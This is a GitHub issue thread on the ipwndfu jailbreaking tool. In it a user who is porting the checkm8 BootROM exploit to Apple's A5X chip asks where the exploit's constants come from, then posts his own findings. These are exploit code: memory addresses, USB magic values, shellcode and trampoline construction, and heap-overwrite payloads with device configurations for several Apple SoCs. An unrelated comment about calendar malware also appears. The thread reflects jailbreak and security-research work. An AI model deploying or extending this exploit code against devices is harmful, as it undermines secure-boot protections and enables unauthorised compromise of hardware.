axi0mX / ipwndfu

open-source jailbreaking tool for many iOS devices
GNU General Public License v3.0
7.04k stars 1.7k forks source link

Question about address #283

Closed soulilya closed 1 year ago

soulilya commented 2 years ago

Hallo. I try to develop checkm8 for A5X. All addresses for nessery constants and functions i allready find (usb and magic addresses). I tryed to figure out with leak, requests qty and padding, but cant sniff usb. How i can do it thru source code Secure Rom?And tell me please if theres somthing else... Thanks

soulilya commented 2 years ago

Where i can get this values: https://github.com/axi0mX/ipwndfu/blob/0e28932ec6a2a570b10fd77e50bda4216418cd98/checkm8.py#L441

ghost commented 2 years ago

Hi how are you does this have to do will all the malware in my calendar. I had to change all my passwords. I'm so sorry if I messed up some how

soulilya commented 2 years ago

Ok, I think now i found all values. Since tool unstable how i can test it for proper work? Right now i have only Windows 10 and WSL sadly... This is my findings on A5X, please confirm correctness someone:

if cpid == 0x8945:
    constants_usb_s5l8945x = [
                0x34000000, # 1 - LOAD_ADDRESS
                0x65786563, # 2 - EXEC_MAGIC
                0x646F6E65, # 3 - DONE_MAGIC
                0x6D656D63, # 4 - MEMC_MAGIC
                0x6D656D73, # 5 - MEMS_MAGIC
                  0x72F4+1, # 6 - USB_CORE_DO_IO      
    ]
    constants_checkm8_s5l8945x = [
                0x3402D888, # 1 - gUSBDescriptors
                0x3402DDE0, # 2 - gUSBSerialNumber
                  0x7878+1, # 3 - usb_create_string_descriptor
                0x3402C1B4, # 4 - gUSBSRNMStringDescriptor
                0x34039800, # 5 - PAYLOAD_DEST
      PAYLOAD_OFFSET_ARMV7, # 6 - PAYLOAD_OFFSET
        PAYLOAD_SIZE_ARMV7, # 7 - PAYLOAD_SIZE
                0x3402D904, # 8 - PAYLOAD_PTR      
    ]
    s5l8945x_handler = asm_thumb_trampoline(0x34039800+1, 0x7D60+1) + prepare_shellcode('usb_0xA1_2_armv7', constants_usb_s5l8945x)[8:]
    s5l8945x_shellcode = prepare_shellcode('checkm8_armv7', constants_checkm8_s5l8945x)
    assert len(s5l8945x_shellcode) <= PAYLOAD_OFFSET_ARMV7
    assert len(s5l8945x_handler) <= PAYLOAD_SIZE_ARMV7
    return s5l8945x_shellcode + '\0' * (PAYLOAD_OFFSET_ARMV7 - len(s5l8945x_shellcode)) + s5l8945x_handler

def all_exploit_configs():
  t8010_nop_gadget = 0x10000CC6C
  t8011_nop_gadget = 0x10000CD0C
  t8015_nop_gadget = 0x10000A9C4

  s5l8945x_overwrite = '\0' * 0x6c0 + struct.pack('<20xI4x', 0x34000000)
  s5l8947x_overwrite = '\0' * 0x660 + struct.pack('<20xI4x', 0x34000000)
  s5l895xx_overwrite = '\0' * 0x640 + struct.pack('<20xI4x', 0x10000000)
  t800x_overwrite    = '\0' * 0x5C0 + struct.pack('<20xI4x', 0x48818000)
  s5l8960x_overwrite = '\0' * 0x580 + struct.pack('<32xQ8x', 0x180380000)
  t8010_overwrite    = '\0' * 0x580 + struct.pack('<32x2Q16x32x2QI',    t8010_nop_gadget, 0x1800B0800, t8010_nop_gadget, 0x1800B0800, 0xbeefbeef)
  t8011_overwrite    = '\0' * 0x500 + struct.pack('<32x2Q16x32x2QI',    t8011_nop_gadget, 0x1800B0800, t8011_nop_gadget, 0x1800B0800, 0xbeefbeef)
  t8015_overwrite    = '\0' * 0x500 + struct.pack('<32x2Q16x32x2Q12xI', t8015_nop_gadget, 0x18001C020, t8015_nop_gadget, 0x18001C020, 0xbeefbeef)

  return [
    DeviceConfig('iBoot-1062.2',          0x8945,  620, s5l8945x_overwrite, None, None),
    DeviceConfig('iBoot-1458.2',          0x8947,  626, s5l8947x_overwrite, None, None), # S5L8947 (DFU loop)     1.97 seconds
    DeviceConfig('iBoot-1145.3'  ,        0x8950,  659, s5l895xx_overwrite, None, None), # S5L8950 (buttons)      2.30 seconds
    DeviceConfig('iBoot-1145.3.3',        0x8955,  659, s5l895xx_overwrite, None, None), # S5L8955 (buttons)      2.30 seconds
    DeviceConfig('iBoot-1704.10',         0x8960, 7936, s5l8960x_overwrite, None, None), # S5L8960 (buttons)     13.97 seconds
    DeviceConfig('iBoot-2651.0.0.1.31',   0x8002, None,    t800x_overwrite,    5,    1), # T8002 (DFU loop)  NEW: 1.27 seconds
    DeviceConfig('iBoot-2651.0.0.3.3',    0x8004, None,    t800x_overwrite,    5,    1), # T8004 (buttons)   NEW: 1.06 seconds
    DeviceConfig('iBoot-2696.0.0.1.33',   0x8010, None,    t8010_overwrite,    5,    1), # T8010 (buttons)   NEW: 0.68 seconds
    DeviceConfig('iBoot-3135.0.0.2.3',    0x8011, None,    t8011_overwrite,    6,    1), # T8011 (buttons)   NEW: 0.87 seconds
    DeviceConfig('iBoot-3332.0.0.1.23',   0x8015, None,    t8015_overwrite,    6,    1), # T8015 (DFU loop)  NEW: 0.66 seconds
  ]